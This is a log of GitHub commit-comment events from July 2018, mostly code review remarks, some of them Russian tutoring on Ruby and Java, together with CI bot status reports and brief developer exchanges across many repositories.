{"id":"8017124822","type":"CommitCommentEvent","actor":{"login":"tbocek"},"repo":{"name":"ICOnator/ICOnator-backend"},"payload":{"comment":{"id":29830358,"position":4,"line":17,"path":"commons/amqp-model/src/main/java/io/iconator/commons/amqp/model/constants/RoutingKeyConstants.java","commit_id":"28ef318ea0d55c082806bb892a6aab6dde35fa87","created_at":"2018-07-25T15:07:42Z","updated_at":"2018-07-25T15:07:42Z","author_association":"MEMBER","body":"Rate communication is done via DB, so no need  to have this routing key."}},"created_at":"2018-07-25T15:07:42Z"}
{"id":"8017125827","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29830359,"position":5,"line":360,"path":"device/sensor/hal/sensor_hal.c","commit_id":"01c386c0400ec82819e240467e5af8e6247404b8","created_at":"2018-07-25T15:07:51Z","updated_at":"2018-07-25T15:07:51Z","author_association":"NONE","body":"You need to ensure that immediately after init, sgp30_read is called at 1Hz interval (SGP30, 0.5Hz for SGPC3), otherwise I'd move the init state handling into the measurement i.e. do the init on the first measurement"}},"created_at":"2018-07-25T15:07:51Z"}
{"id":"8017126382","type":"CommitCommentEvent","actor":{"login":"pierrelstan"},"repo":{"name":"pierrelstan/PWAREACTJS"},"payload":{"comment":{"id":29830360,"position":null,"line":null,"path":null,"commit_id":"4dcb0a53df7f632039826870b631fc0c0143fe65","created_at":"2018-07-25T15:07:57Z","updated_at":"2018-07-25T15:07:57Z","author_association":"OWNER","body":"adding description in the head html for the perfomance"}},"created_at":"2018-07-25T15:07:57Z"}
{"id":"8017134106","type":"CommitCommentEvent","actor":{"login":"Eloverflow"},"repo":{"name":"mirageflow/blogproject"},"payload":{"comment":{"id":29830369,"position":null,"line":null,"path":null,"commit_id":"646d2418777c718cb9c833f87186aa7023c237a8","created_at":"2018-07-25T15:09:10Z","updated_at":"2018-07-25T15:09:10Z","author_association":"MEMBER","body":"Failed attempt"}},"created_at":"2018-07-25T15:09:10Z"}
{"id":"8017136741","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29830375,"position":30,"line":24,"path":"lesson2/date.rb","commit_id":"ce782f4354aad8d4f1ec3af2bf33cb76b35766ba","created_at":"2018-07-25T15:09:34Z","updated_at":"2018-07-25T15:09:34Z","author_association":"NONE","body":"вместо строчек 8 и 17-19 лучше просто в этой строчке написать вот так:  `months[0...month - 1]` - три точки вместо двух и из массива будут браться элементы ДО указанного индекса"}},"created_at":"2018-07-25T15:09:34Z"}
{"id":"8017138057","type":"CommitCommentEvent","actor":{"login":"gsmachado"},"repo":{"name":"ICOnator/ICOnator-backend"},"payload":{"comment":{"id":29830377,"position":4,"line":17,"path":"commons/amqp-model/src/main/java/io/iconator/commons/amqp/model/constants/RoutingKeyConstants.java","commit_id":"28ef318ea0d55c082806bb892a6aab6dde35fa87","created_at":"2018-07-25T15:09:47Z","updated_at":"2018-07-25T15:09:47Z","author_association":"MEMBER","body":"True. It was not being used. I checked it here now."}},"created_at":"2018-07-25T15:09:47Z"}
{"id":"8017143001","type":"CommitCommentEvent","actor":{"login":"NivaldoMS"},"repo":{"name":"Lablnet/PHP-UserInfo-Class"},"payload":{"comment":{"id":29830385,"position":213,"line":58,"path":"Classes/UserInfo.php","commit_id":"d17378d22097264bb4ffbd90d3e1910aeaf7a964","created_at":"2018-07-25T15:10:31Z","updated_at":"2018-07-25T15:10:31Z","author_association":"NONE","body":"-      if (preg_match_all('/MSIE/i', $this->UserAgent)) {\r\n-\r\n-        $this->Browser  = 'Internet Explorer';\r\n-\r\n-        $this->B_Agent = \"MSIE\"; \r\n-\r\n-      }elseif(preg_match_all('/Firefox/i', $this->UserAgent)){"}},"created_at":"2018-07-25T15:10:31Z"}
{"id":"8017143263","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29830388,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-25T15:10:34Z","updated_at":"2018-07-25T15:10:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T15:10:34Z"}
{"id":"8017144580","type":"CommitCommentEvent","actor":{"login":"olstenlarck"},"repo":{"name":"amio/badgen-service"},"payload":{"comment":{"id":29830391,"position":null,"line":null,"path":null,"commit_id":"321b76c302ac4142f615fc5811710e570fbe4ee2","created_at":"2018-07-25T15:10:45Z","updated_at":"2018-07-25T15:10:45Z","author_association":"CONTRIBUTOR","body":"Btw, should allow to pass `icon` name. I've detected that limitation before few hours that from live-fns we can't pass `icon`. We should allow this, so we can add `github` icon infront of, for example, github release badge."}},"created_at":"2018-07-25T15:10:45Z"}
{"id":"8017145600","type":"CommitCommentEvent","actor":{"login":"mvl22"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29830393,"position":null,"line":null,"path":null,"commit_id":"5401a5a2590224783192ea17ed4b15c2b027e766","created_at":"2018-07-25T15:10:54Z","updated_at":"2018-07-25T15:10:54Z","author_association":"COLLABORATOR","body":"Good work.\r\n\r\nSee if you can create an API documentation page, by expanding `$getVals` to have more attributes than just the validation type, e.g. adding a title and description for each."}},"created_at":"2018-07-25T15:10:54Z"}
{"id":"8017151634","type":"CommitCommentEvent","actor":{"login":"erictraut"},"repo":{"name":"Microsoft/reactxp"},"payload":{"comment":{"id":29830402,"position":null,"line":null,"path":null,"commit_id":"2f783b8d8f9e9afe52d00c9cbf4a8bc2a2288ecc","created_at":"2018-07-25T15:11:50Z","updated_at":"2018-07-25T15:11:50Z","author_association":"MEMBER","body":"This was an oversight. It should be removed and added to .gitignore so it's not included in the future."}},"created_at":"2018-07-25T15:11:50Z"}
{"id":"8017154836","type":"CommitCommentEvent","actor":{"login":"gsmachado"},"repo":{"name":"ICOnator/ICOnator-backend"},"payload":{"comment":{"id":29830409,"position":17,"line":40,"path":"services/rates/src/main/java/io/iconator/rates/service/ExchangeRateService.java","commit_id":"28ef318ea0d55c082806bb892a6aab6dde35fa87","created_at":"2018-07-25T15:12:20Z","updated_at":"2018-07-25T15:12:20Z","author_association":"MEMBER","body":"So... both these etherScanClient (consumer) and the blockchainInfoCLient (consumer) --> I didn't get. I would not do this way, because we are storing the blockNr on the consumer class, right?"}},"created_at":"2018-07-25T15:12:20Z"}
{"id":"8017155000","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29830410,"position":5,"line":2,"path":"lesson2/fibonacci.rb","commit_id":"ce782f4354aad8d4f1ec3af2bf33cb76b35766ba","created_at":"2018-07-25T15:12:21Z","updated_at":"2018-07-25T15:12:21Z","author_association":"NONE","body":"вместо безусловного цикла `loop` с `break` внутри, лучше использовать цикл `while` с условием"}},"created_at":"2018-07-25T15:12:21Z"}
{"id":"8017155210","type":"CommitCommentEvent","actor":{"login":"adrianbj"},"repo":{"name":"rolandtoth/AdminOnSteroids"},"payload":{"comment":{"id":29830412,"position":1,"line":1,"path":".gitattributes","commit_id":"2b005490c417eb5282e3d0d043b865dcbba106aa","created_at":"2018-07-25T15:12:23Z","updated_at":"2018-07-25T15:12:23Z","author_association":"NONE","body":"This line isn't need / doesn't do anything. It's just a copy of `cat`ing the file from the command line :)\r\n\r\nI think we all copied something from @horst-n original post where he linked to this: https://github.com/horst-n/MetadataExif/blob/03ae18d3ac25888c5692c08dd5de06d9ec52a636/.gitattributes#L1-L2"}},"created_at":"2018-07-25T15:12:23Z"}
{"id":"8017157423","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29830420,"position":4,"line":1,"path":"lesson2/fibonacci.rb","commit_id":"ce782f4354aad8d4f1ec3af2bf33cb76b35766ba","created_at":"2018-07-25T15:12:44Z","updated_at":"2018-07-25T15:12:44Z","author_association":"NONE","body":"массивы в руби рекомендуют записывать, разделяя элементы пробелом:\r\n```ruby\r\narr = [1, 2, 3] # good\r\n\r\narr = [1,2,3] # bad\r\n```"}},"created_at":"2018-07-25T15:12:44Z"}
{"id":"8017158045","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"Rivernina/netcore-workbook"},"payload":{"comment":{"id":29830422,"position":1,"line":1,"path":"Lesson01/Lesson-00-Homework/Lesson00-Homework.sln","commit_id":"3861f9bbfbaeb01482675ea75565b85245486018","created_at":"2018-07-25T15:12:50Z","updated_at":"2018-07-25T15:12:50Z","author_association":"NONE","body":"This is Lesson 00 homework. I need the Pre-Work for Lesson 01 which was switching the Layout between _MyLayout and _Layout based in the evenness of the current minute."}},"created_at":"2018-07-25T15:12:50Z"}
{"id":"8017163272","type":"CommitCommentEvent","actor":{"login":"oco-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29830431,"position":16,"line":52,"path":"addons/account/wizard/setup_wizards.py","commit_id":"b30fed7a7bd9a26406c23b7ef19590df50be6c06","created_at":"2018-07-25T15:13:36Z","updated_at":"2018-07-25T15:13:36Z","author_association":"CONTRIBUTOR","body":"Oops ! Done : https://github.com/odoo/odoo/commit/691a5818ee94e84146d268a008ff8e9034963ad3 ;)"}},"created_at":"2018-07-25T15:13:36Z"}
{"id":"8017167851","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"google/honggfuzz"},"payload":{"comment":{"id":29830439,"position":null,"line":null,"path":null,"commit_id":"64e3a05714155bc19fdbd2a78be94a881fa35029","created_at":"2018-07-25T15:14:16Z","updated_at":"2018-07-25T15:14:16Z","author_association":"NONE","body":"I see, perror(3) looks good too!"}},"created_at":"2018-07-25T15:14:16Z"}
{"id":"8017170115","type":"CommitCommentEvent","actor":{"login":"Alliga1Tor"},"repo":{"name":"jl777/coins"},"payload":{"comment":{"id":29830450,"position":null,"line":null,"path":null,"commit_id":"b5bfe4098c66dd51ddedd8c5353625a50df88cc5","created_at":"2018-07-25T15:14:37Z","updated_at":"2018-07-25T15:14:37Z","author_association":"NONE","body":" b5bfe40"}},"created_at":"2018-07-25T15:14:37Z"}
{"id":"8017170553","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29830453,"position":12,"line":9,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"e4ccc36ef4e7f4a4c065e27072189641f9ac2e0c","created_at":"2018-07-25T15:14:41Z","updated_at":"2018-07-25T15:14:41Z","author_association":"NONE","body":"Давай теперь проговорим, что ты говоришь компилятору сделать в этой строке: ```static MyOutput myOut = myPrintln();```\r\n- Объявить в классе ```MyOutput``` статическое поле типа ```MyOutput```\r\n- Вызвать метод myPrintln()\r\n- Сохранить значение, возвращённое методом myPrintln() в поле ```myOut```\r\n\r\nВначале задумайся, именно ли это то, что ты хотел сказать компилятору. Если нет, то напиши мне, где твои ожидания разошлись с действительностью.\r\n\r\n> поле myOut является статическим и не может вызывать не статические методы\r\n\r\nПоле не вызвывает методы - если быть точным, скорее при встроенной инициализации статическое поле не может быть инициализировано не-статическим методом. Дело в том, что с точки зрения JVM вообще никакие действия не могут выполняться вне методов класса. Весь выполняемый код (команды) всегда находится в том или ином методе. В том числе команды вызовов методов и инициализация полей. На уровне класса может находится только описание методов, полей и встроенных классов. Так что если мы хотим задать полю какое-то значение, мы должны писать соответствующий код в каком-то методе. Но с точки зрения программиста это не очень удобно, гораздо удобнее указывать значения  для полей сразу после их объявления. Поэтому компилятор позволяет нам так писать, но при этом при компиляции он весь инициализирующий код переносит в конструкторы класса - методы, который вызываются автоматически при создании объекта.\r\n \r\nТо есть вот такой код\r\n```java\r\nclass A{\r\n    int field = 5; // объявление поля с инициализацией\r\n}\r\n```\r\nбудует превращён компилятором вот в такой код\r\n```java\r\nclass A{\r\n    int field; // объявление поля с инициализацией\r\n    A() { // конструктор\r\n        this.field = 5; // инициализация поля\r\n    }\r\n}\r\n```\r\nТо же самое относится к инициализации поля значением, возвращённым методом.\r\nПри этом если поле статическое, то инициализироваться оно будет в статичном конструкторе, который вызывается при первом обращении к имени класса. А из статического конструктора можно вызывать только статические методы. ПОэтому, хоть мы сами и не пишем весь этот код с конструкторами, его пишет за нас компилятор и он будет ругаться, если мы будем пробовать инициализировать стактическое поле нестатическим методом, т.к. он не сможет написать для этого случая корректный код в конструкторе.\r\n\r\nЭта справка сейчас была скорее для общего понимания, чем для конкретной задачи. Поскольку  в этой задаче инициализация из метода нам вряд ли потребуется и уж точно мы не будем инициализировать ```myOut``` методом ```myPrintyln()```. Посмотри, у метода ```myPrintyln()``` указано ```void``` - то есть этот метод не возвращает никакого значения. Значит от него мы не получим того значения, которым мы могли бы инициализировать поле ```myOut```. Можно конечно изменить метод так, чтобы он возвращал значение типа ```MyOutput````, но всё равно в этом случае нужно откуда-то взять это значение внутри метода, чтобы вернуть его. В любом случае нужно где-то создать экземпляр этого класса и каким-то спосбом передать его в поле ```myOut```. Я не вижу никаких причин, почему это не сделать прямо в инициализации самого поля, без вызово каких-либо методов - просто создать объект и ссылку на него сохранить в поле, весь код в одну строку."}},"created_at":"2018-07-25T15:14:41Z"}
{"id":"8017172479","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"Urichardson74/netcore-workbook"},"payload":{"comment":{"id":29830475,"position":1,"line":1,"path":"Character/Character.sln","commit_id":"3a6bf08ccf987179c52f5f9e4dfc5b8406ba0c86","created_at":"2018-07-25T15:14:58Z","updated_at":"2018-07-25T15:14:58Z","author_association":"NONE","body":"I do not see a the _MyLayout.cshtml file, so you may have committed the project for this assignment. This first graded Pre-Work is over switching the layout based on the evenness of the current minute."}},"created_at":"2018-07-25T15:14:58Z"}
{"id":"8017175620","type":"CommitCommentEvent","actor":{"login":"jdstrand"},"repo":{"name":"zyga/snapd"},"payload":{"comment":{"id":29830487,"position":null,"line":null,"path":null,"commit_id":"b186de2e3c9285eec1b121bc1f47621a67b8d6fc","created_at":"2018-07-25T15:15:24Z","updated_at":"2018-07-25T15:15:24Z","author_association":"NONE","body":"This is pretty complicated. The apparmor service looks at mtimes and will regenerate if the profile if newer than the mtime of the cache. In addition, this snap-apparmor-parser is going to be used somewhere to see if there is a preprocessed sha1 file that exists, and if not, generate it and overwrite the cache. This will be hard to debug if something goes wrong since there is another layer and is papering over the faulty fixrtc logic which is clearly wrong. Please see my comment in the forum on how to fix that."}},"created_at":"2018-07-25T15:15:24Z"}
{"id":"8017178860","type":"CommitCommentEvent","actor":{"login":"mlynch"},"repo":{"name":"ionic-team/ionic"},"payload":{"comment":{"id":29830505,"position":null,"line":null,"path":null,"commit_id":"0db643df450a6083f5b5a8031f56e720ab933775","created_at":"2018-07-25T15:15:51Z","updated_at":"2018-07-25T15:15:51Z","author_association":"MEMBER","body":"AWWWWWWW YEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"}},"created_at":"2018-07-25T15:15:51Z"}
{"id":"8017180528","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29830511,"position":5,"line":5,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"e4ccc36ef4e7f4a4c065e27072189641f9ac2e0c","created_at":"2018-07-25T15:16:06Z","updated_at":"2018-07-25T15:16:06Z","author_association":"NONE","body":"Постарайся вернуться к прошлой структуре. Поле ```myOut``` должно быть в классе ```MySystem```, а не в ```MySystem.MyOutput```"}},"created_at":"2018-07-25T15:16:06Z"}
{"id":"8017189150","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29830530,"position":null,"line":null,"path":null,"commit_id":"968b9174dfac8097b0c6642d2a344068067f7d1d","created_at":"2018-07-25T15:17:20Z","updated_at":"2018-07-25T15:17:20Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-42](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-42).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-42-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-25T15:17:20Z"}
{"id":"8017189950","type":"CommitCommentEvent","actor":{"login":"mikhot"},"repo":{"name":"evggorev/bookies_albatros"},"payload":{"comment":{"id":29830531,"position":null,"line":null,"path":null,"commit_id":"2ed57885d6f6842b808ae69953b44d961880824f","created_at":"2018-07-25T15:17:27Z","updated_at":"2018-07-25T15:17:27Z","author_association":"COLLABORATOR","body":"You can use this file to create pandas databases you want for your research"}},"created_at":"2018-07-25T15:17:27Z"}
{"id":"8017192755","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29830539,"position":5,"line":2,"path":"lesson2/fibonacci.rb","commit_id":"ce782f4354aad8d4f1ec3af2bf33cb76b35766ba","created_at":"2018-07-25T15:17:52Z","updated_at":"2018-07-25T15:17:52Z","author_association":"NONE","body":"петля в этом случае будет начинаться как-то так: `while next_element < 100` и в ней нужно вычислять `next_element`, чтобы проверка на входе в петлю работала"}},"created_at":"2018-07-25T15:17:52Z"}
{"id":"8017193532","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29830544,"position":null,"line":null,"path":null,"commit_id":"dd8fb63e53a8656f593c840ed09b475e09e67cab","created_at":"2018-07-25T15:17:59Z","updated_at":"2018-07-25T15:17:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Checkout ElasticSearch and Firestore combo](https://trello.com/c/6SI2Q7qv/67-checkout-elasticsearch-and-firestore-combo)"}},"created_at":"2018-07-25T15:17:59Z"}
{"id":"8017193943","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29830545,"position":null,"line":null,"path":null,"commit_id":"484f17d5391957587dc294fe46c550531e2e3bdc","created_at":"2018-07-25T15:18:03Z","updated_at":"2018-07-25T15:18:03Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Checkout ElasticSearch and Firestore combo](https://trello.com/c/6SI2Q7qv/67-checkout-elasticsearch-and-firestore-combo)"}},"created_at":"2018-07-25T15:18:03Z"}
{"id":"8017199518","type":"CommitCommentEvent","actor":{"login":"emptyrivers"},"repo":{"name":"WeakAuras/WeakAuras2"},"payload":{"comment":{"id":29830568,"position":9,"line":25,"path":"CONTRIBUTING.md","commit_id":"52da1b2d40e084d0753302c01346ea69f673b25c","created_at":"2018-07-25T15:18:51Z","updated_at":"2018-07-25T15:18:51Z","author_association":"CONTRIBUTOR","body":"Rude."}},"created_at":"2018-07-25T15:18:51Z"}
{"id":"8017209360","type":"CommitCommentEvent","actor":{"login":"amio"},"repo":{"name":"amio/badgen-service"},"payload":{"comment":{"id":29830580,"position":null,"line":null,"path":null,"commit_id":"321b76c302ac4142f615fc5811710e570fbe4ee2","created_at":"2018-07-25T15:20:09Z","updated_at":"2018-07-25T15:20:09Z","author_association":"OWNER","body":"I think query params should be the choices of user, better not to inline those params into live-fns, otherwise we need to provide another option for user to disable it, like `icon=none` 😅"}},"created_at":"2018-07-25T15:20:09Z"}
{"id":"8017213554","type":"CommitCommentEvent","actor":{"login":"funkyfuture"},"repo":{"name":"funkyfuture/docker-rpi-syncthing"},"payload":{"comment":{"id":29830599,"position":null,"line":null,"path":null,"commit_id":"f6c01ed6374ba9311779530b2f29cc76c9e13c82","created_at":"2018-07-25T15:20:43Z","updated_at":"2018-07-25T15:20:43Z","author_association":"OWNER","body":"no, i have to build it on my non-running Raspberry Pi. you can build the image yourself as described in the `README`."}},"created_at":"2018-07-25T15:20:43Z"}
{"id":"8017215575","type":"CommitCommentEvent","actor":{"login":"supropell"},"repo":{"name":"DariaKalinina/basic-react-13-11"},"payload":{"comment":{"id":29830605,"position":4,"line":1,"path":"src/components/App.js","commit_id":"0ffde75219ede876f024f651f02af25ca8920ff0","created_at":"2018-07-25T15:21:01Z","updated_at":"2018-07-25T15:21:01Z","author_association":"NONE","body":"Ещё можно импортить реакт так:\r\nimport * as React from \"react\";\r\n\r\nэто позволит тебе пользоваться всеми его составными частями не импортя их отдельно."}},"created_at":"2018-07-25T15:21:01Z"}
{"id":"8017224409","type":"CommitCommentEvent","actor":{"login":"shonumi"},"repo":{"name":"shonumi/gbe-plus"},"payload":{"comment":{"id":29830617,"position":null,"line":null,"path":null,"commit_id":"57217d95b8250082b3400a1b705857af1ae0d1d0","created_at":"2018-07-25T15:22:23Z","updated_at":"2018-07-25T15:22:23Z","author_association":"OWNER","body":"GBE+ can now internally emulate connecting to the GB Mobile homepage (the homepage is basically whatever we want it to be, using our own data). As far as GBE+ is concerned, this is just for \"demo\" purposes. In the future, GBE+ will be able to connect to an emulated server (over a network, either hosted locally, or running on the web).\r\n\r\nEmulated GB Mobile servers are something I'm going to work on. They'll be part of the overall GBE+ project, but in a separate repository."}},"created_at":"2018-07-25T15:22:23Z"}
{"id":"8017226176","type":"CommitCommentEvent","actor":{"login":"supropell"},"repo":{"name":"DariaKalinina/basic-react-13-11"},"payload":{"comment":{"id":29830620,"position":6,"line":4,"path":"src/components/Article.js","commit_id":"0ffde75219ede876f024f651f02af25ca8920ff0","created_at":"2018-07-25T15:22:39Z","updated_at":"2018-07-25T15:22:39Z","author_association":"NONE","body":"А здесь, если бы заимпортила реакт как пространство имён, то можно было бы писать\r\nextends React.Component"}},"created_at":"2018-07-25T15:22:39Z"}
{"id":"8017226925","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29830622,"position":null,"line":null,"path":null,"commit_id":"f2973055f4db295609d7d4ae36d61229efb18057","created_at":"2018-07-25T15:22:46Z","updated_at":"2018-07-25T15:22:46Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (mjwitte) - x86_64-MacOS-10.9-clang: Tests Failed (1385 of 2946 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2973055f4db295609d7d4ae36d61229efb18057-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2973055f4db295609d7d4ae36d61229efb18057-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.01%25-red.png)</a> \n"}},"created_at":"2018-07-25T15:22:46Z"}
{"id":"8017233916","type":"CommitCommentEvent","actor":{"login":"semihalf-ostruszka-andrzej"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29830631,"position":null,"line":null,"path":null,"commit_id":"09232a6dbb6d70ab8f4d0f270d4cbf25cd6f8fc5","created_at":"2018-07-25T15:23:50Z","updated_at":"2018-07-25T15:23:50Z","author_association":"NONE","body":"Not in this commit - in later commits (when I add mac filtering) I add ether include and I can use ETHER_ADDR_LEN if you prefer to."}},"created_at":"2018-07-25T15:23:50Z"}
{"id":"8017274389","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29830714,"position":null,"line":null,"path":null,"commit_id":"5ab50d9024210168ef54ee05bad9eb6447a5118a","created_at":"2018-07-25T15:30:03Z","updated_at":"2018-07-25T15:30:03Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ab50d9024210168ef54ee05bad9eb6447a5118a-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-25T15:30:03Z"}
{"id":"8017276419","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29830722,"position":7,"line":2,"path":"Lesson_4/lib/cargo_wagon.rb","commit_id":"153c9b5f3efec473b79cdf22a878ed1c4cc56f40","created_at":"2018-07-25T15:30:21Z","updated_at":"2018-07-25T15:30:21Z","author_association":"NONE","body":"про тип та же рекомендация, что и для класса КаргоТрейн"}},"created_at":"2018-07-25T15:30:21Z"}
{"id":"8017279778","type":"CommitCommentEvent","actor":{"login":"MarioMarioMario123"},"repo":{"name":"ten10solutions/foundations-of-tech"},"payload":{"comment":{"id":29830731,"position":null,"line":null,"path":null,"commit_id":"6898da1fa310ec4b03d6f5a8f1a38bc04a0e3ed4","created_at":"2018-07-25T15:30:51Z","updated_at":"2018-07-25T15:30:51Z","author_association":"COLLABORATOR","body":"what u sayin big man "}},"created_at":"2018-07-25T15:30:51Z"}
{"id":"8017283081","type":"CommitCommentEvent","actor":{"login":"OguzBey"},"repo":{"name":"OguzBey/Spaydi"},"payload":{"comment":{"id":29830736,"position":null,"line":null,"path":null,"commit_id":"8a918d4d41c2674ee142c10fe0bbff97683c26fc","created_at":"2018-07-25T15:31:21Z","updated_at":"2018-07-25T15:31:21Z","author_association":"OWNER","body":"Logic bug fixed and added new feature. "}},"created_at":"2018-07-25T15:31:21Z"}
{"id":"8017283344","type":"CommitCommentEvent","actor":{"login":"Beau-Crenshaw"},"repo":{"name":"OHDSI/OMOP-Standardized-Vocabularies"},"payload":{"comment":{"id":29830737,"position":null,"line":null,"path":null,"commit_id":"1730943d352b41007e6cb1d269fafa722b8f8378","created_at":"2018-07-25T15:31:24Z","updated_at":"2018-07-25T15:31:24Z","author_association":"NONE","body":"Hi - I was directed here by Tammy Powell regarding HCPCS codes. I tried using the revised link, and got a \"bad request\". Any help would be greatly appreciated "}},"created_at":"2018-07-25T15:31:24Z"}
{"id":"8017290012","type":"CommitCommentEvent","actor":{"login":"trini"},"repo":{"name":"u-boot/u-boot"},"payload":{"comment":{"id":29830745,"position":null,"line":null,"path":null,"commit_id":"78a88f7930becb78afef09c1237a8e4edc1b01e1","created_at":"2018-07-25T15:32:23Z","updated_at":"2018-07-25T15:32:23Z","author_association":"CONTRIBUTOR","body":"Yes, looks like it, thanks for the report."}},"created_at":"2018-07-25T15:32:23Z"}
{"id":"8017291226","type":"CommitCommentEvent","actor":{"login":"colin-combe"},"repo":{"name":"Rappsilber-Laboratory/xiSPEC_website"},"payload":{"comment":{"id":29830746,"position":null,"line":null,"path":null,"commit_id":"e60144179c10122f245f6585b022e3c533f1c214","created_at":"2018-07-25T15:32:34Z","updated_at":"2018-07-25T15:32:34Z","author_association":"NONE","body":"could it just return $name? (looks like duplicate calls to trim_file_name)"}},"created_at":"2018-07-25T15:32:34Z"}
